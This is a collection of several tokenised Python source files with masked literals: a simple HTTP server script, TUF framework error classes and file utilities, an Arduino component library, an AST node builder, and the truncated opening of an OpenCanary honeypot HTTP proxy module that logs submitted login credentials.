<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> from __future__ import absolute_import <EOL> from __future__ import division <EOL> from __future__ import unicode_literals <EOL> import sys <EOL> import random <EOL> import six <EOL> PORT = <NUM_LIT:0> <EOL> def _port_gen ( ) : <EOL> return random . randint ( <NUM_LIT> , <NUM_LIT> ) <EOL> if len ( sys . argv ) > <NUM_LIT:1> : <EOL> try : <EOL> PORT = int ( sys . argv [ <NUM_LIT:1> ] ) <EOL> if PORT < <NUM_LIT> or PORT > <NUM_LIT> : <EOL> raise ValueError <EOL> except ValueError : <EOL> PORT = _port_gen ( ) <EOL> else : <EOL> PORT = _port_gen ( ) <EOL> Handler = six . moves . SimpleHTTPServer . SimpleHTTPRequestHandler <EOL> httpd = six . moves . socketserver . TCPServer ( ( '<STR_LIT>' , PORT ) , Handler ) <EOL> httpd . serve_forever ( ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> from __future__ import absolute_import <EOL> from __future__ import division <EOL> from __future__ import unicode_literals <EOL> import six <EOL> import logging <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> __all__ = [ '<STR_LIT>' ] <EOL> class Error ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class Warning ( Warning ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class FormatError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class InvalidMetadataJSONError ( FormatError ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , exception ) : <EOL> self . exception = exception <EOL> def __str__ ( self ) : <EOL> return repr ( self . exception ) <EOL> class UnsupportedAlgorithmError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class BadHashError ( Error ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , expected_hash , observed_hash ) : <EOL> self . expected_hash = expected_hash <EOL> self . observed_hash = observed_hash <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' + repr ( self . observed_hash ) + '<STR_LIT>' + repr ( self . expected_hash ) + '<STR_LIT:)>' <EOL> class BadVersionNumberError ( Error ) : <EOL> """<STR_LIT>""" <EOL> class BadPasswordError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class UnknownKeyError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class RepositoryError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class InsufficientKeysError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class ForbiddenTargetError ( RepositoryError ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class ExpiredMetadataError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class ReplayedMetadataError ( RepositoryError ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , metadata_role , previous_version , current_version ) : <EOL> self . metadata_role = metadata_role <EOL> self . previous_version = previous_version <EOL> self . 
current_version = current_version <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' + repr ( self . metadata_role ) + '<STR_LIT>' + repr ( self . previous_version ) + '<STR_LIT>' + '<STR_LIT>' + repr ( self . current_version ) + '<STR_LIT>' <EOL> class CryptoError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class BadSignatureError ( CryptoError ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , metadata_role_name ) : <EOL> self . metadata_role_name = metadata_role_name <EOL> def __str__ ( self ) : <EOL> return repr ( self . metadata_role_name ) + '<STR_LIT>' <EOL> class UnknownMethodError ( CryptoError ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class UnsupportedLibraryError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class DecompressionError ( Error ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , exception ) : <EOL> self . exception = exception <EOL> def __str__ ( self ) : <EOL> return repr ( self . exception ) <EOL> class DownloadError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class DownloadLengthMismatchError ( DownloadError ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , expected_length , observed_length ) : <EOL> self . expected_length = expected_length <EOL> self . observed_length = observed_length <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' + repr ( self . observed_length ) + '<STR_LIT>' + repr ( self . expected_length ) + '<STR_LIT>' <EOL> class SlowRetrievalError ( DownloadError ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , average_download_speed ) : <EOL> self . __average_download_speed = average_download_speed <EOL> def __str__ ( self ) : <EOL> return '<STR_LIT>' + repr ( self . 
__average_download_speed ) + '<STR_LIT>' <EOL> class KeyAlreadyExistsError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class RoleAlreadyExistsError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class UnknownRoleError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class UnknownTargetError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class InvalidNameError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class UnsignedMetadataError ( Error ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , message , signable ) : <EOL> self . exception_message = message <EOL> self . signable = signable <EOL> def __str__ ( self ) : <EOL> return self . exception_message <EOL> class NoWorkingMirrorError ( Error ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , mirror_errors ) : <EOL> self . mirror_errors = mirror_errors <EOL> def __str__ ( self ) : <EOL> all_errors = '<STR_LIT>' <EOL> for mirror_url , mirror_error in six . iteritems ( self . mirror_errors ) : <EOL> try : <EOL> mirror_url_tokens = six . moves . urllib . parse . urlparse ( mirror_url ) <EOL> except : <EOL> logger . exception ( '<STR_LIT>' + repr ( mirror_url ) ) <EOL> mirror_netloc = mirror_url <EOL> else : <EOL> mirror_netloc = mirror_url_tokens . netloc <EOL> all_errors += '<STR_LIT>' + repr ( mirror_netloc ) + '<STR_LIT>' + repr ( mirror_error ) <EOL> return all_errors <EOL> class NotFoundError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class URLMatchesNoPatternError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class InvalidConfigurationError ( Error ) : <EOL> """<STR_LIT>""" <EOL> pass </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> from __future__ import absolute_import <EOL> from __future__ import division <EOL> from __future__ import unicode_literals <EOL> import os <EOL> import sys <EOL> import gzip <EOL> import shutil <EOL> import logging <EOL> import tempfile <EOL> import tuf <EOL> import tuf . hash <EOL> import tuf . conf <EOL> import tuf . formats <EOL> import six <EOL> HASH_FUNCTION = '<STR_LIT>' <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> class TempFile ( object ) : <EOL> """<STR_LIT>""" <EOL> def _default_temporary_directory ( self , prefix ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> self . temporary_file = tempfile . NamedTemporaryFile ( prefix = prefix ) <EOL> except OSError as err : <EOL> logger . critical ( '<STR_LIT>' + repr ( err ) ) <EOL> raise tuf . Error ( err ) <EOL> def __init__ ( self , prefix = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> self . _compression = None <EOL> self . _orig_file = None <EOL> temp_dir = tuf . conf . temporary_directory <EOL> if temp_dir is not None and tuf . formats . PATH_SCHEMA . matches ( temp_dir ) : <EOL> try : <EOL> self . temporary_file = tempfile . NamedTemporaryFile ( prefix = prefix , <EOL> dir = temp_dir ) <EOL> except OSError as err : <EOL> logger . error ( '<STR_LIT>' + temp_dir + '<STR_LIT>' + repr ( err ) ) <EOL> logger . error ( '<STR_LIT>' ) <EOL> self . _default_temporary_directory ( prefix ) <EOL> else : <EOL> self . _default_temporary_directory ( prefix ) <EOL> def get_compressed_length ( self ) : <EOL> """<STR_LIT>""" <EOL> return os . stat ( self . temporary_file . name ) . st_size <EOL> def flush ( self ) : <EOL> """<STR_LIT>""" <EOL> self . temporary_file . flush ( ) <EOL> def read ( self , size = None ) : <EOL> """<STR_LIT>""" <EOL> if size is None : <EOL> self . temporary_file . seek ( <NUM_LIT:0> ) <EOL> data = self . temporary_file . read ( ) <EOL> self . temporary_file . 
seek ( <NUM_LIT:0> ) <EOL> return data <EOL> else : <EOL> if not ( isinstance ( size , int ) and size > <NUM_LIT:0> ) : <EOL> raise tuf . FormatError <EOL> return self . temporary_file . read ( size ) <EOL> def write ( self , data , auto_flush = True ) : <EOL> """<STR_LIT>""" <EOL> self . temporary_file . write ( data ) <EOL> if auto_flush : <EOL> self . flush ( ) <EOL> def move ( self , destination_path ) : <EOL> """<STR_LIT>""" <EOL> self . flush ( ) <EOL> self . seek ( <NUM_LIT:0> ) <EOL> destination_file = open ( destination_path , '<STR_LIT:wb>' ) <EOL> shutil . copyfileobj ( self . temporary_file , destination_file ) <EOL> destination_file . close ( ) <EOL> self . close_temp_file ( ) <EOL> def seek ( self , * args ) : <EOL> """<STR_LIT>""" <EOL> self . temporary_file . seek ( * args ) <EOL> def decompress_temp_file_object ( self , compression ) : <EOL> """<STR_LIT>""" <EOL> tuf . formats . NAME_SCHEMA . check_match ( compression ) <EOL> if self . _orig_file is not None : <EOL> raise tuf . Error ( '<STR_LIT>' ) <EOL> if compression != '<STR_LIT>' : <EOL> raise tuf . Error ( '<STR_LIT>' ) <EOL> self . seek ( <NUM_LIT:0> ) <EOL> self . _compression = compression <EOL> self . _orig_file = self . temporary_file <EOL> try : <EOL> gzip_file_object = gzip . GzipFile ( fileobj = self . temporary_file , mode = '<STR_LIT:rb>' ) <EOL> uncompressed_content = gzip_file_object . read ( ) <EOL> self . temporary_file = tempfile . NamedTemporaryFile ( ) <EOL> self . temporary_file . write ( uncompressed_content ) <EOL> self . flush ( ) <EOL> except Exception as exception : <EOL> raise tuf . DecompressionError ( exception ) <EOL> def close_temp_file ( self ) : <EOL> """<STR_LIT>""" <EOL> self . temporary_file . close ( ) <EOL> if self . _orig_file is not None : <EOL> self . _orig_file . close ( ) <EOL> def get_file_details ( filepath , hash_algorithms = [ '<STR_LIT>' ] ) : <EOL> """<STR_LIT>""" <EOL> tuf . formats . PATH_SCHEMA . check_match ( filepath ) <EOL> tuf . formats . 
HASHALGORITHMS_SCHEMA . check_match ( hash_algorithms ) <EOL> file_hashes = { } <EOL> if not os . path . exists ( filepath ) : <EOL> raise tuf . Error ( '<STR_LIT>' + repr ( filepath ) + '<STR_LIT>' ) <EOL> filepath = os . path . abspath ( filepath ) <EOL> file_length = os . path . getsize ( filepath ) <EOL> for algorithm in hash_algorithms : <EOL> digest_object = tuf . hash . digest_filename ( filepath , algorithm ) <EOL> file_hashes . update ( { algorithm : digest_object . hexdigest ( ) } ) <EOL> tuf . formats . HASHDICT_SCHEMA . check_match ( file_hashes ) <EOL> return file_length , file_hashes <EOL> def ensure_parent_dir ( filename ) : <EOL> """<STR_LIT>""" <EOL> tuf . formats . PATH_SCHEMA . check_match ( filename ) <EOL> directory = os . path . split ( filename ) [ <NUM_LIT:0> ] <EOL> if directory and not os . path . exists ( directory ) : <EOL> os . makedirs ( directory , <NUM_LIT> ) <EOL> def file_in_confined_directories ( filepath , confined_directories ) : <EOL> """<STR_LIT>""" <EOL> tuf . formats . RELPATH_SCHEMA . check_match ( filepath ) <EOL> tuf . formats . RELPATHS_SCHEMA . check_match ( confined_directories ) <EOL> for confined_directory in confined_directories : <EOL> if confined_directory == '<STR_LIT>' : <EOL> return True <EOL> filepath = os . path . normpath ( filepath ) <EOL> confined_directory = os . path . normpath ( confined_directory ) <EOL> if os . path . dirname ( filepath ) == confined_directory : <EOL> return True <EOL> return False <EOL> def find_delegated_role ( roles , delegated_role ) : <EOL> """<STR_LIT>""" <EOL> tuf . formats . ROLELIST_SCHEMA . check_match ( roles ) <EOL> tuf . formats . ROLENAME_SCHEMA . check_match ( delegated_role ) <EOL> role_index = None <EOL> for index in six . moves . xrange ( len ( roles ) ) : <EOL> role = roles [ index ] <EOL> name = role . get ( '<STR_LIT:name>' ) <EOL> if name is None : <EOL> no_name_message = '<STR_LIT>' <EOL> raise tuf . 
RepositoryError ( no_name_message ) <EOL> else : <EOL> if name == delegated_role : <EOL> if role_index is None : <EOL> role_index = index <EOL> else : <EOL> duplicate_role_message = '<STR_LIT>' + str ( delegated_role ) + '<STR_LIT>' <EOL> raise tuf . RepositoryError ( duplicate_role_message ) <EOL> else : <EOL> logger . debug ( '<STR_LIT>' + repr ( delegated_role ) ) <EOL> return role_index <EOL> def ensure_all_targets_allowed ( rolename , list_of_targets , parent_delegations ) : <EOL> """<STR_LIT>""" <EOL> tuf . formats . ROLENAME_SCHEMA . check_match ( rolename ) <EOL> tuf . formats . RELPATHS_SCHEMA . check_match ( list_of_targets ) <EOL> tuf . formats . DELEGATIONS_SCHEMA . check_match ( parent_delegations ) <EOL> if rolename == '<STR_LIT>' : <EOL> return <EOL> roles = parent_delegations [ '<STR_LIT>' ] <EOL> role_index = find_delegated_role ( roles , rolename ) <EOL> if role_index is not None : <EOL> role = roles [ role_index ] <EOL> allowed_child_paths = role . get ( '<STR_LIT>' ) <EOL> allowed_child_path_hash_prefixes = role . get ( '<STR_LIT>' ) <EOL> actual_child_targets = list_of_targets <EOL> if allowed_child_path_hash_prefixes is not None : <EOL> consistent = paths_are_consistent_with_hash_prefixes <EOL> if not consistent ( actual_child_targets , <EOL> allowed_child_path_hash_prefixes ) : <EOL> message = repr ( rolename ) + '<STR_LIT>' + '<STR_LIT>' <EOL> raise tuf . ForbiddenTargetError ( message ) <EOL> elif allowed_child_paths is not None : <EOL> for child_target in actual_child_targets : <EOL> for allowed_child_path in allowed_child_paths : <EOL> prefix = os . path . commonprefix ( [ child_target , allowed_child_path ] ) <EOL> if prefix == allowed_child_path : <EOL> break <EOL> else : <EOL> raise tuf . ForbiddenTargetError ( '<STR_LIT>' + repr ( rolename ) + '<STR_LIT>' + '<STR_LIT>' + repr ( child_target ) + '<STR_LIT:U+002C>' + '<STR_LIT>' + '<STR_LIT>' + '<STR_LIT>' ) <EOL> else : <EOL> raise tuf . 
FormatError ( repr ( role ) + '<STR_LIT>' + '<STR_LIT>' + '<STR_LIT>' ) <EOL> else : <EOL> raise tuf . RepositoryError ( '<STR_LIT>' + repr ( rolename ) + '<STR_LIT:.>' ) <EOL> def paths_are_consistent_with_hash_prefixes ( paths , path_hash_prefixes ) : <EOL> """<STR_LIT>""" <EOL> tuf . formats . RELPATHS_SCHEMA . check_match ( paths ) <EOL> tuf . formats . PATH_HASH_PREFIXES_SCHEMA . check_match ( path_hash_prefixes ) <EOL> consistent = False <EOL> for path in paths : <EOL> path_hash = get_target_hash ( path ) <EOL> consistent = False <EOL> for path_hash_prefix in path_hash_prefixes : <EOL> if path_hash . startswith ( path_hash_prefix ) : <EOL> consistent = True <EOL> break <EOL> if not consistent : <EOL> break <EOL> return consistent <EOL> def get_target_hash ( target_filepath ) : <EOL> """<STR_LIT>""" <EOL> tuf . formats . RELPATH_SCHEMA . check_match ( target_filepath ) <EOL> digest_object = tuf . hash . digest ( HASH_FUNCTION ) <EOL> encoded_target_filepath = target_filepath . encode ( '<STR_LIT:utf-8>' ) <EOL> digest_object . update ( encoded_target_filepath ) <EOL> target_filepath_hash = digest_object . hexdigest ( ) <EOL> return target_filepath_hash <EOL> _json_module = None <EOL> def import_json ( ) : <EOL> """<STR_LIT>""" <EOL> global _json_module <EOL> if _json_module is not None : <EOL> return _json_module <EOL> else : <EOL> try : <EOL> module = __import__ ( '<STR_LIT>' ) <EOL> except ImportError : <EOL> raise ImportError ( '<STR_LIT>' ) <EOL> else : <EOL> _json_module = module <EOL> return module <EOL> json = import_json ( ) <EOL> def load_json_string ( data ) : <EOL> """<STR_LIT>""" <EOL> deserialized_object = None <EOL> try : <EOL> deserialized_object = json . loads ( data ) <EOL> except TypeError : <EOL> message = '<STR_LIT>' + repr ( data ) <EOL> raise tuf . Error ( message ) <EOL> except ValueError : <EOL> message = '<STR_LIT>' + repr ( data ) <EOL> raise tuf . 
Error ( message ) <EOL> else : <EOL> return deserialized_object <EOL> def load_json_file ( filepath ) : <EOL> """<STR_LIT>""" <EOL> tuf . formats . PATH_SCHEMA . check_match ( filepath ) <EOL> deserialized_object = None <EOL> if filepath . endswith ( '<STR_LIT>' ) : <EOL> logger . debug ( '<STR_LIT>' + str ( filepath ) + '<STR_LIT:)>' ) <EOL> fileobject = six . StringIO ( gzip . open ( filepath ) . read ( ) . decode ( '<STR_LIT:utf-8>' ) ) <EOL> else : <EOL> logger . debug ( '<STR_LIT>' + str ( filepath ) + '<STR_LIT:)>' ) <EOL> fileobject = open ( filepath ) <EOL> try : <EOL> deserialized_object = json . load ( fileobject ) <EOL> except ( ValueError , TypeError ) as e : <EOL> message = '<STR_LIT>' + repr ( filepath ) <EOL> raise tuf . Error ( message ) <EOL> else : <EOL> fileobject . close ( ) <EOL> return deserialized_object <EOL> finally : <EOL> fileobject . close ( ) <EOL> def digests_are_equal ( digest1 , digest2 ) : <EOL> """<STR_LIT>""" <EOL> tuf . formats . HEX_SCHEMA . check_match ( digest1 ) <EOL> tuf . formats . HEX_SCHEMA . check_match ( digest2 ) <EOL> if len ( digest1 ) != len ( digest2 ) : <EOL> return False <EOL> are_equal = True <EOL> for element in range ( len ( digest1 ) ) : <EOL> if digest1 [ element ] != digest2 [ element ] : <EOL> are_equal = False <EOL> return are_equal </s>
<s> import re <EOL> import threading <EOL> import pyfirmata <EOL> from util import EventEmitter , setInterval , debounce <EOL> class ArduinoNotSuppliedException ( Exception ) : <EOL> pass <EOL> class ServoOutOfRangeException ( Exception ) : <EOL> pass <EOL> class InvalidPercentageException ( Exception ) : <EOL> pass <EOL> class Component ( EventEmitter ) : <EOL> def __init__ ( self , board , pin ) : <EOL> if not board : <EOL> raise ArduinoNotSuppliedException <EOL> super ( Component , self ) . __init__ ( ) <EOL> self . _board = board <EOL> analog_regex = re . compile ( '<STR_LIT>' ) <EOL> match = analog_regex . match ( str ( pin ) ) <EOL> if match : <EOL> self . _pin = self . _board . analog [ int ( match . group ( <NUM_LIT:1> ) ) ] <EOL> else : <EOL> self . _pin = self . _board . digital [ int ( pin ) ] <EOL> @ property <EOL> def value ( self ) : <EOL> return self . _pin . value <EOL> class Sensor ( Component ) : <EOL> def __init__ ( self , board , pin ) : <EOL> super ( Sensor , self ) . __init__ ( board , pin ) <EOL> self . threshold = <NUM_LIT> <EOL> self . _pin . mode = pyfirmata . INPUT <EOL> self . _pin . enable_reporting ( ) <EOL> self . _old_value = self . value <EOL> self . _board . on ( '<STR_LIT:data>' , self . _handle_data ) <EOL> def _handle_data ( self ) : <EOL> value = self . value or <NUM_LIT:0> <EOL> high_value = value + self . threshold <EOL> low_value = value - self . threshold <EOL> if self . _old_value < low_value or self . _old_value > high_value : <EOL> self . _old_value = value <EOL> self . _handle_state_changed ( ) <EOL> @ debounce ( <NUM_LIT> ) <EOL> def _handle_state_changed ( self ) : <EOL> self . emit ( '<STR_LIT>' ) <EOL> def change ( self , cb ) : <EOL> self . on ( '<STR_LIT>' , cb ) <EOL> class Led ( Component ) : <EOL> def __init__ ( self , board , pin ) : <EOL> super ( Led , self ) . __init__ ( board , pin ) <EOL> self . _isOn = False <EOL> self . _interval = None <EOL> def on ( self ) : <EOL> self . _pin . 
write ( <NUM_LIT:1> ) <EOL> self . _isOn = True <EOL> return self <EOL> def off ( self , clear = True ) : <EOL> self . _pin . write ( <NUM_LIT:0> ) <EOL> self . _isOn = False <EOL> if self . _interval and clear : <EOL> self . _interval . clear ( ) <EOL> return self <EOL> def toggle ( self ) : <EOL> if self . _isOn : <EOL> return self . off ( clear = False ) <EOL> else : <EOL> return self . on ( ) <EOL> def blink ( self , millis ) : <EOL> if self . _interval : <EOL> self . _interval . clear ( ) <EOL> self . _interval = setInterval ( self . toggle , millis ) <EOL> def brightness ( self , value ) : <EOL> if int ( value ) > <NUM_LIT:100> or int ( value ) < <NUM_LIT:0> : <EOL> raise InvalidPercentageException <EOL> if self . _pin . mode != pyfirmata . PWM : <EOL> self . _pin . mode = pyfirmata . PWM <EOL> _new_value = value / <NUM_LIT> <EOL> if _new_value == <NUM_LIT:0> : <EOL> self . _isOn = False <EOL> else : <EOL> self . isOn = True <EOL> self . _pin . write ( _new_value ) <EOL> return self <EOL> class RGBLed ( EventEmitter ) : <EOL> def __init__ ( self , board , pins ) : <EOL> if not board : <EOL> raise ArduinoNotSuppliedException <EOL> super ( RGBLed , self ) . __init__ ( ) <EOL> self . _red = Led ( board , pins [ "<STR_LIT>" ] ) <EOL> self . _green = Led ( board , pins [ "<STR_LIT>" ] ) <EOL> self . _blue = Led ( board , pins [ "<STR_LIT>" ] ) <EOL> def off ( self ) : <EOL> self . _red . off ( ) <EOL> self . _green . off ( ) <EOL> self . _blue . off ( ) <EOL> return self <EOL> def red ( self ) : <EOL> self . _red . on ( ) <EOL> self . _green . off ( ) <EOL> self . _blue . off ( ) <EOL> return self <EOL> def green ( self ) : <EOL> self . _red . off ( ) <EOL> self . _green . on ( ) <EOL> self . _blue . off ( ) <EOL> return self <EOL> def blue ( self ) : <EOL> self . _red . off ( ) <EOL> self . _green . off ( ) <EOL> self . _blue . on ( ) <EOL> return self <EOL> def yellow ( self ) : <EOL> self . _red . on ( ) <EOL> self . _green . on ( ) <EOL> self . _blue . 
off ( ) <EOL> return self <EOL> def cyan ( self ) : <EOL> self . _red . off ( ) <EOL> self . _green . on ( ) <EOL> self . _blue . on ( ) <EOL> return self <EOL> def purple ( self ) : <EOL> self . _red . on ( ) <EOL> self . _green . off ( ) <EOL> self . _blue . on ( ) <EOL> return self <EOL> def white ( self ) : <EOL> self . _red . on ( ) <EOL> self . _green . on ( ) <EOL> self . _blue . on ( ) <EOL> return self <EOL> class Buzzer ( Led ) : <EOL> pass <EOL> class Button ( Sensor ) : <EOL> def __init__ ( self , board , pin ) : <EOL> super ( Button , self ) . __init__ ( board , pin ) <EOL> self . _old_value = False <EOL> self . _timeout = None <EOL> self . change ( self . _emit_button_events ) <EOL> def _handle_data ( self ) : <EOL> value = self . value <EOL> if self . _old_value != value : <EOL> self . _old_value = value <EOL> self . _handle_state_changed ( ) <EOL> def _emit_button_events ( self ) : <EOL> if self . value is False : <EOL> if ( self . _timeout ) : <EOL> self . _timeout . cancel ( ) <EOL> self . emit ( '<STR_LIT>' ) <EOL> elif self . value : <EOL> def emit_hold ( ) : <EOL> self . emit ( '<STR_LIT>' ) <EOL> self . _timeout = threading . Timer ( <NUM_LIT:1> , emit_hold ) <EOL> self . _timeout . start ( ) <EOL> self . emit ( '<STR_LIT>' ) <EOL> def down ( self , cb ) : <EOL> self . on ( '<STR_LIT>' , cb ) <EOL> def up ( self , cb ) : <EOL> self . on ( '<STR_LIT>' , cb ) <EOL> def hold ( self , cb ) : <EOL> self . on ( '<STR_LIT>' , cb ) <EOL> class Servo ( Component ) : <EOL> def __init__ ( self , board , pin ) : <EOL> super ( Servo , self ) . __init__ ( board , pin ) <EOL> self . _pin . mode = pyfirmata . SERVO <EOL> def set_position ( self , degrees ) : <EOL> if int ( degrees ) > <NUM_LIT> or int ( degrees ) < <NUM_LIT:0> : <EOL> raise ServoOutOfRangeException <EOL> self . _pin . write ( degrees ) <EOL> def move ( self , degrees ) : <EOL> self . set_position ( self . value + int ( degrees ) ) <EOL> def center ( self ) : <EOL> self . 
set_position ( <NUM_LIT> ) <EOL> def reset ( self ) : <EOL> self . set_position ( <NUM_LIT:0> ) <EOL> class Motor ( Component ) : <EOL> def __init__ ( self , board , pin ) : <EOL> super ( Motor , self ) . __init__ ( board , pin ) <EOL> self . _speed = <NUM_LIT:0> <EOL> self . _pin . mode = pyfirmata . PWM <EOL> def start ( self , speed = <NUM_LIT:50> ) : <EOL> self . speed = speed <EOL> def stop ( self ) : <EOL> self . speed = <NUM_LIT:0> <EOL> @ property <EOL> def speed ( self ) : <EOL> return self . _speed <EOL> @ speed . setter <EOL> def speed ( self , speed ) : <EOL> if int ( speed ) > <NUM_LIT:100> or int ( speed ) < <NUM_LIT:0> : <EOL> raise InvalidPercentageException <EOL> self . _speed = speed <EOL> self . _pin . write ( speed / <NUM_LIT> ) <EOL> self . emit ( '<STR_LIT>' , speed ) </s>
<s> from pdb import set_trace as br <EOL> class ASTBuilder : <EOL> def ast ( self , begin , ast ) : <EOL> end = self . parser . input . position <EOL> full = '<STR_LIT>' . join ( self . parser . input . data ) <EOL> text = full [ begin : end ] <EOL> start_line = full [ : begin ] . count ( "<STR_LIT:\n>" ) + self . line_offset <EOL> start_col = begin - full . rfind ( "<STR_LIT:\n>" , <NUM_LIT:0> , begin ) - <NUM_LIT:1> <EOL> end_line = start_line + text . count ( "<STR_LIT:\n>" ) <EOL> inside_nl = text . rfind ( "<STR_LIT:\n>" , <NUM_LIT:0> ) <EOL> if inside_nl == - <NUM_LIT:1> : <EOL> end_col = start_col + len ( text ) <EOL> else : <EOL> end_col = len ( text [ inside_nl : ] ) <EOL> node = ASTNode ( ast , text , start_line , start_col , end_line , end_col ) <EOL> return node <EOL> def sint_ast ( self , last_begin , ast ) : <EOL> end = self . parser . input . position <EOL> full = '<STR_LIT>' . join ( self . parser . input . data ) <EOL> text = full [ last_begin : end ] <EOL> line = full [ : last_begin ] . count ( "<STR_LIT:\n>" ) + self . line_offset + <NUM_LIT:2> <EOL> node = ASTNode ( ast , text , line , <NUM_LIT:0> , line , <NUM_LIT:0> ) <EOL> return node <EOL> class ASTNode ( ) : <EOL> def __init__ ( self , lst , text , start_line , start_col , end_line , end_col ) : <EOL> self . lst = lst <EOL> self . text = text <EOL> self . start_line = start_line <EOL> self . start_col = start_col <EOL> self . end_line = end_line <EOL> self . end_col = end_col <EOL> def __len__ ( self ) : <EOL> return len ( self . lst ) <EOL> def __getitem__ ( self , key ) : <EOL> return self . lst [ key ] <EOL> def __setitem__ ( self , key , val ) : <EOL> self . lst [ key ] = val <EOL> def __delitem__ ( self , key ) : <EOL> del self . lst [ key ] <EOL> def __iter__ ( self ) : <EOL> return self . lst . __iter__ ( ) <EOL> def __reversed__ ( self ) : <EOL> return self . lst . __reversed__ ( ) <EOL> def __contains__ ( self , item ) : <EOL> return item in self . 
lst <EOL> def __coerce__ ( self , other ) : <EOL> if hasattr ( other , '<STR_LIT>' ) : <EOL> return ( self , other ) <EOL> return None <EOL> def __add__ ( self , other ) : <EOL> return self . lst + other <EOL> def __radd__ ( self , other ) : <EOL> return other + self . lst <EOL> def __str__ ( self ) : <EOL> return self . lst . __str__ ( ) <EOL> def __iter__ ( self ) : <EOL> return self . lst . __iter__ ( ) <EOL> def __repr__ ( self ) : <EOL> return self . lst . __repr__ ( ) <EOL> def __eq__ ( self , other ) : <EOL> return id ( other ) == id ( self ) or id ( other ) == id ( self . lst ) or other == self . lst <EOL> def __ne__ ( self , other ) : <EOL> return not self . __eq__ ( other ) <EOL> def __getslice__ ( self , i , j ) : <EOL> return self . lst . __getslice__ ( i , j ) <EOL> def __getattr__ ( self , name ) : <EOL> return self . __dict__ [ name ] <EOL> def __setattr__ ( self , name , val ) : <EOL> self . __dict__ [ name ] = val </s>
<s> import os <EOL> import datetime <EOL> from opencanary . modules import CanaryService <EOL> from base64 import b64decode <EOL> import urlparse <EOL> from urllib import quote as urlquote <EOL> from twisted . application import internet <EOL> from twisted . internet . protocol import ServerFactory <EOL> from twisted . application . internet import TCPServer <EOL> from twisted . internet . protocol import ClientFactory <EOL> from twisted . internet import protocol <EOL> from twisted . web . http import HTTPClient , Request , HTTPChannel <EOL> from twisted . web import http <EOL> from twisted . internet import reactor <EOL> from jinja2 import Template <EOL> PROFILES = { <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : True , <EOL> "<STR_LIT>" : [ <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ] , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } , <EOL> "<STR_LIT>" : { <EOL> "<STR_LIT>" : '<STR_LIT>' , <EOL> "<STR_LIT>" : [ <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT:1.0>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) , <EOL> ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> ] , <EOL> "<STR_LIT>" : "<STR_LIT>" <EOL> } <EOL> } <EOL> class AlertProxyRequest ( Request ) : <EOL> """<STR_LIT>""" <EOL> FACTORY = None <EOL> def __init__ ( self , channel , queued ) : <EOL> Request . __init__ ( self , channel , queued ) <EOL> def logAuth ( self ) : <EOL> auth = self . getHeader ( "<STR_LIT>" ) <EOL> if auth is None : <EOL> return <EOL> factory = AlertProxyRequest . FACTORY <EOL> username , password = "<STR_LIT>" , "<STR_LIT>" <EOL> atype , token = auth . split ( "<STR_LIT:U+0020>" ) <EOL> if atype == "<STR_LIT>" : <EOL> try : <EOL> username , password = b64decode ( token ) . 
